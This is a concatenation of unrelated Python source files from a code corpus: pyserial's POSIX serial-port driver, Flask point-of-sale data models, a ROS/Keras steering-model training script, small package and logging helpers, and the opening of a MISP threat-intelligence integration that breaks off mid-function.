150: 0o000005, 200: 0o000006, 300: 0o000007, 600: 0o000010, 1200: 0o000011, 1800: 0o000012, 2400: 0o000013, 4800: 0o000014, 9600: 0o000015, 19200: 0o000016, 38400: 0o000017, 57600: 0o010001, 115200: 0o010002, 230400: 0o010003, 460800: 0o010004, 500000: 0o010005, 576000: 0o010006, 921600: 0o010007, 1000000: 0o010010, 1152000: 0o010011, 1500000: 0o010012, 2000000: 0o010013, 2500000: 0o010014, 3000000: 0o010015, 3500000: 0o010016, 4000000: 0o010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat == 'openbsd3': # BSD (confirmed) def device(port): return '/dev/ttyp%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd' or \ plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d) def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # whats up with "aix", "beos", .... # they should work, just need to know the device names. # load some constants for later use. # try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. This may throw a SerialException if the port cannot be opened.""" self.fd = None if self._port is None: raise SerialException("Port must be configured before it can be used.") # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except Exception as msg: self.fd = None raise SerialException("could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True #~ self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd) except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() while len(read) < size: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. raise SerialException('device reports readiness to read but returned no data (device disconnected?)') read.extend(buf) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if self.fd is None: raise portNotOpenError t = len(data) d = data if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while t > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError d = d[n:] t = t - n except OSError as v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if self.fd is None: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def drainOutput(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """For easier use of the serial port instance with select. WARNING: this function is not portable to different platforms!""" if self.fd is None: raise portNotOpenError return self.fd def flowControl(self, enable): """manually control flow - when hardware or software flow control is enabled""" if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) # assemble Serial class with the platform specifc implementation and the base # for file-like behavior. for Python 2.6 and newer, that provide the new I/O # library, derrive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write('hello') sys.stdout.write('%r\n' % s.read(5)) sys.stdout.write('%s\n' % s.inWaiting()) del s
2.5
2
Older Examples - enter at your own risk/lavender_pos/app/models.py
electricimp/examples
26
1889
<reponame>electricimp/examples import datetime from database import Base from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float class User(Base): __tablename__ = 'users' id = Column(Integer, primary_key=True) first_name = Column(String(255)) last_name = Column(String(255)) email = Column(String(255), index=True, unique=True) password = Column(String(255)) def get_id(self): """ Callback for Flask-Login. Represents that unique ID of a given user object. It is unicoded as per specification. Returns: the unique ID of an object """ return unicode(self.id) def is_anonymous(self): """ Callback for Flask-Login. Default to False - we don't deal with any anonymous users. Returns: False """ return False def is_active(self): """ Callback for Flask-Login. Default to True - we don't deal with non-active users. Returns: True """ return True def is_authenticated(self): """ Callback for Flask-Login. Should return True unless the object represents a user should not be authenticated. Returns: True because all objects should be authenticated """ return True class PendingTransaction(Base): __tablename__ = 'pending_transactions' id = Column(Integer, primary_key=True) barcode = Column(String(10)) user_id = Column(Integer, ForeignKey('users.id')) timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now()) # Status: 0 - default, 1 - scanned, 2 - claimed status = Column(Integer, default=0) company = Column(Integer, ForeignKey('vendors.id')) amount = Column(Float) class Transaction(Base): __tablename__ = 'transactions' id = Column(Integer, primary_key=True) user_id = Column(Integer, ForeignKey('users.id')) company = Column(Integer, ForeignKey('vendors.id')) amount = Column(Float) timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now()) class Vendor(Base): __tablename__ = 'vendors' id = Column(Integer, primary_key=True) name = Column(String(255)) agent_url = Column(String(255)) secret = Column(String(255))
2.9375
3
rr_ml/nodes/end_to_end/train.py
ebretl/roboracing-software
0
1890
import os import math import string import numpy as np import rospy import keras from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, \ GaussianNoise, BatchNormalization import cv2 import collections import random import time from example_set import ExampleSet from params import input_shape, expand_categories n_examples_to_load = 8000 # if the number of training examples is below this, load more data batch_size = 16 categories = [None] def defineCategory(steering): differences = [abs(steering - category) for category in categories] category = np.argmin(differences) oneHot = [1 if i == category else 0 for i in range(len(categories))] return oneHot def format_inputs(examples): data2 = np.zeros((len(examples),) + input_shape, dtype='float32') for i, ex in enumerate(examples): data2[i] = ex.get_image() data2 /= 255.0 return data2 def make_model(): model = Sequential() # 128 x 48 model.add(GaussianNoise(0.05, input_shape=input_shape)) model.add(Conv2D(32, (3, 3), activation='relu', padding='same')) model.add(MaxPooling2D((4, 4))) # 32 x 12 model.add(Conv2D(64, (3, 3), activation='relu', padding='same')) model.add(MaxPooling2D((2, 2))) # 16 x 6 model.add(Flatten()) model.add(Dropout(0.25)) model.add(Dense(128, activation='relu')) model.add(Dense(32, activation='relu')) model.add(Dropout(0.35)) model.add(Dense(len(categories), activation='softmax')) model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy']) return model def main(): global categories, n_examples_to_load, batch_size rospy.init_node("nn_training") startTime = time.time() model_path = rospy.get_param("~model_output_path") exampleSetDir = rospy.get_param("~example_set_dir") epochs = int(rospy.get_param("~epochs")) categories = rospy.get_param("~positive_nonzero_categories") categories = string.strip(categories).split(" ") categories = [float(x) for x in categories] categories = expand_categories(categories) model = make_model() model.summary() exampleSetFiles_const = tuple(f for f in os.listdir(exampleSetDir) if '.pkl.lz4' in f) n_training_examples = 0 n_test_examples = 0 cnt = collections.Counter() for f in exampleSetFiles_const: data = ExampleSet.load(os.path.join(exampleSetDir, f)) n_training_examples += len(data.train) n_test_examples += len(data.test) for ex in data.train: i = np.argmax(defineCategory(ex.angle)) cnt[i] += 1 print "total training examples:", n_training_examples print "training label counts:", cnt def batch_generator(isValidation = False): gen_epochs = 1 if isValidation else epochs for epoch in range(gen_epochs): exampleSetFiles = list(exampleSetFiles_const) random.shuffle(exampleSetFiles) while len(exampleSetFiles) > 0: D = [] while len(exampleSetFiles) > 0 and len(D) < n_examples_to_load: data = ExampleSet.load(os.path.join(exampleSetDir, exampleSetFiles.pop())) D += data.test if isValidation else data.train if not isValidation: random.shuffle(D) X = format_inputs(D) # create output bins labels = np.array([defineCategory(ex.angle) for ex in D]) if not isValidation: for i in range(len(X)): if random.random() < 0.4: # 40% of images are flipped X[i] = cv2.flip(X[i], 1) labels[i] = labels[i][::-1] for i in range(0, len(X), batch_size): xs = X[i: i + batch_size] ys = labels[i: i + batch_size] yield (xs, ys) try: n_minibatches = int(math.ceil(float(n_training_examples) / batch_size)) model.fit_generator(batch_generator(), steps_per_epoch=n_minibatches, epochs=epochs, verbose=1) print "elapsed time:", time.time() - startTime n_minibatches = int(math.ceil(float(n_test_examples) / batch_size)) loss, acc = model.evaluate_generator(batch_generator(True), steps=n_minibatches) print "validation loss:", loss, "| validation accuracy:", acc finally: model.save(model_path) print "\nsaved model to", model_path
2.75
3
build/lib/Kronos_heureka_code/Zeit/__init__.py
heureka-code/Kronos-heureka-code
0
1891
<filename>build/lib/Kronos_heureka_code/Zeit/__init__.py<gh_stars>0 from Kronos_heureka_code.Zeit.Uhrzeit import Uhrzeit, Stunde, Minute, Sekunde from Kronos_heureka_code.Zeit.Datum.Monat import Monate from Kronos_heureka_code.Zeit.Datum.Jahr import Jahr, Zeitrechnung from Kronos_heureka_code.Zeit.Datum.Tag import Tag
1.273438
1
retro_star/utils/logger.py
cthoyt/retro_star
65
1892
<reponame>cthoyt/retro_star<filename>retro_star/utils/logger.py<gh_stars>10-100 import logging def setup_logger(fname=None, silent=False): if fname is None: logging.basicConfig( level=logging.INFO if not silent else logging.CRITICAL, format='%(name)-12s: %(levelname)-8s %(message)s', datefmt='%m-%d %H:%M', filemode='w' ) else: logging.basicConfig( level=logging.INFO if not silent else logging.CRITICAL, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s', datefmt='%m-%d %H:%M', filename=fname, filemode='w' ) console = logging.StreamHandler() console.setLevel(logging.INFO) formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s') console.setFormatter(formatter) logging.getLogger('').addHandler(console)
2.421875
2
Packs/MISP/Integrations/MISPV3/MISPV3.py
hiep4hiep/content
0
1893
# type: ignore from typing import Union, List, Dict from urllib.parse import urlparse import urllib3 from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute from pymisp.tools import GenericObjectGenerator import copy from pymisp.tools import FileObject from CommonServerPython import * logging.getLogger("pymisp").setLevel(logging.CRITICAL) def handle_connection_errors(error): if "SSLError" in error: return_error('Unable to connect to MISP because of a SSLCertVerificationError, ' 'Please try to use the Trust any certificate option.') if "NewConnectionError" in error: return_error('Unable to connect to MISP because of a NewConnectionError, ' 'Please make sure your MISP server url is correct.') if "Please make sure the API key and the URL are correct" in error: return_error('Unable to connect to MISP, ' 'Please make sure the API key is correct.') return_error(error) def warn(*args): """ Do nothing with warnings """ pass # Disable requests warnings urllib3.disable_warnings() # Disable python warnings warnings.warn = warn ''' GLOBALS/PARAMS ''' params = demisto.params() if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')): raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.') MISP_URL = params.get('url') VERIFY = not params.get('insecure') PROXIES = handle_proxy() # type: ignore try: PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES) except PyMISPError as e: handle_connection_errors(e.message) PREDEFINED_FEEDS = { 'CIRCL': {'name': 'CIRCL OSINT Feed', 'url': 'https://www.circl.lu/doc/misp/feed-osint', 'format': 'misp', 'input': 'network'}, 'Botvrij.eu': {'name': 'The Botvrij.eu Data', 'url': 'http://www.botvrij.eu/data/feed-osint', 'format': 'misp', 'input': 'network'} } THREAT_LEVELS_TO_ID = { 'High': 1, 'Medium': 2, 'Low': 3, 'Unknown': 4 } MISP_ENTITIES_TO_CONTEXT_DATA = { 'deleted': 'Deleted', 'category': 'Category', 'comment': 'Comment', 'uuid': 'UUID', 'sharing_group_id': 'SharingGroupID', 'timestamp': 'LastChanged', 'to_ids': 'ToIDs', 'value': 'Value', 'event_id': 'EventID', 'ShadowAttribute': 'ShadowAttribute', 'disable_correlation': 'DisableCorrelation', 'distribution': 'Distribution', 'type': 'Type', 'id': 'ID', 'date': 'CreationDate', 'info': 'Info', 'published': 'Published', 'attribute_count': 'AttributeCount', 'proposal_email_lock': 'ProposalEmailLock', 'locked': 'Locked', 'publish_timestamp': 'PublishTimestamp', 'event_creator_email': 'EventCreatorEmail', 'name': 'Name', 'analysis': 'Analysis', 'threat_level_id': 'ThreatLevelID', 'old_id': 'OldID', 'org_id': 'OrganizationID', 'Org': 'Organization', 'Orgc': 'OwnerOrganization', 'orgc_uuid': 'OwnerOrganization.UUID', 'orgc_id': 'OwnerOrganization.ID', 'orgc_name': 'OwnerOrganization.Name', 'event_uuid': 'EventUUID', 'proposal_to_delete': 'ProposalToDelete', 'description': 'Description', 'version': 'Version', 'Object': 'Object', 'object_id': 'ObjectID', 'object_relation': 'ObjectRelation', 'template_version': 'TemplateVersion', 'template_uuid': 'TemplateUUID', 'meta-category': 'MetaCategory', 'decay_score': 'DecayScore', 'first_seen': 'first_seen', 'last_seen': 'last_seen', 'provider': 'Provider', 'source_format': 'SourceFormat', 'url': 'URL', 'event_uuids': 'EventUUIDS', } MISP_ANALYSIS_TO_IDS = { 'initial': 0, 'ongoing': 1, 'completed': 2 } MISP_DISTRIBUTION_TO_IDS = { 'Your_organization_only': 0, 'This_community_only': 1, 'Connected_communities': 2, 'All_communities': 3, 'Inherit_event': 5 } SIGHTING_TYPE_NAME_TO_ID = { 'sighting': 0, 'false_positive': 1, 'expiration': 2 } SIGHTING_TYPE_ID_TO_NAME = { '0': 'sighting', '1': 'false_positive', '2': 'expiration' } INDICATOR_TYPE_TO_DBOT_SCORE = { 'FILE': DBotScoreType.FILE, 'URL': DBotScoreType.URL, 'DOMAIN': DBotScoreType.DOMAIN, 'IP': DBotScoreType.IP, 'EMAIL': DBotScoreType.EMAIL, } DOMAIN_REGEX = ( r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}" "[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*" "\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css" "|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$" "|localhost)" ) MISP_SEARCH_ARGUMENTS = [ 'value', 'type', 'category', 'org', 'tags', 'from', 'to', 'event_id', 'uuid', 'to_ids', 'last', 'include_decay_score', 'include_sightings', 'include_correlations', 'limit', 'page', 'enforceWarninglist', 'include_feed_correlations', ] EVENT_FIELDS = [ 'id', 'orgc_id', 'org_id', 'date', 'threat_level_id', 'info', 'published', 'uuid', 'analysis', 'attribute_count', 'timestamp', 'distribution', 'proposal_email_lock', 'locked', 'publish_timestamp', 'sharing_group_id', 'disable_correlation', 'event_creator_email', 'Org', 'Orgc', 'RelatedEvent', 'Galaxy', 'Tag', 'decay_score', 'Object', 'Feed', ] ATTRIBUTE_FIELDS = [ 'id', 'event_id', 'object_id', 'object_relation', 'category', 'type', 'to_ids', 'uuid', 'timestamp', 'distribution', 'sharing_group_id', 'comment', 'deleted', 'disable_correlation', 'first_seen', 'last_seen', 'value', 'Event', 'Object', 'Galaxy', 'Tag', 'decay_score', 'Sighting', ] def extract_error(error: list) -> List[dict]: """ Extracting errors raised by PYMISP into readable response, for more information and examples please see UT: test_extract_error. Args: error: list of responses from error section Returns: List[Dict[str, any]]: filtered response """ return [{ 'code': err[0], 'message': err[1].get('message'), 'errors': err[1].get('errors') } for err in error] def dict_to_generic_object_format(args: dict) -> List[dict]: """ Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp. Args: args: dictionary describes MISP object Returns: list: list containing dicts that GenericObjectGenerator can take. Examples: >>> {'ip': '8.8.8.8', 'domain': 'google.com'} [{'ip': '8.8.8.8'}, {'domain': 'google.com'}] """ return [{k: v} for k, v in args.items()] def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator: """ Args: template_name: template name as described in https://github.com/MISP/misp-objects args: arguments to create the generic object Returns: GenericObjectGenerator: object created in MISP Example: args should look like: [{'analysis_submitted_at': '2018-06-15T06:40:27'}, {'threat_score': {value=95, to_ids=False}}, {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'}, {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96}, {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line """ misp_object = GenericObjectGenerator(template_name) misp_object.generate_attributes(args) return misp_object def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str: """ Gets a timestamp from MISP response (1546713469) and converts it to human readable format """ return 